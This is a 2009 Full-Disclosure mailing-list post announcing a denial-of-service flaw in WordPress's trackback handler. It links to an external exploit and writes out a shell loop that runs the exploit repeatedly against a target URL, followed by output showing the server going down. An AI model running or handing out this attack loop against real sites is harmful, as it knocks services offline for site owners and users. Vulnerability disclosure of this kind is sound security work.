fernando at zerial
Oct 19, 2009, 4:51 AM
Post #1 of 1
(293 views)
Permalink
|
|
[Wordpress] Resource Exhaustion (Denial of Service)
|
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
jcarlosn [http://rooibo.wordpress.com/] has discovered an Denial of
Service by Resource Exhaustion in all wordpress version.
This vulnerability affects the wp-trackbacks.php file and already exists
an available exploit for it.
The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps
Execution:
$ while /bin/true; do php test.php http://target.bom/wordpress; done
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
hit!
Notice: fputs(): send of 8192 bytes failed with errno=11 Resource
temporarily unavailable
down!!
Load average: 22.07, 15.18, 8.58 (on target server)
- --
Fernando A. Lagos Berardi - Zerial
Desarrollador y Programador Web
Seguridad Informatica
Linux User #382319
Blog: http://blog.zerial.org
Skype: erzerial
Jabber: zerial [at] jabberes
GTalk && MSN: fernando [at] zerial
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAkrcUsIACgkQIP17Kywx9JQnNQCeOwPir0lZxguy8d4LDmNzKxD8
CyYAoJEEAaoyOnE09VbVRveUQU7Uapcq
=pFaY
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
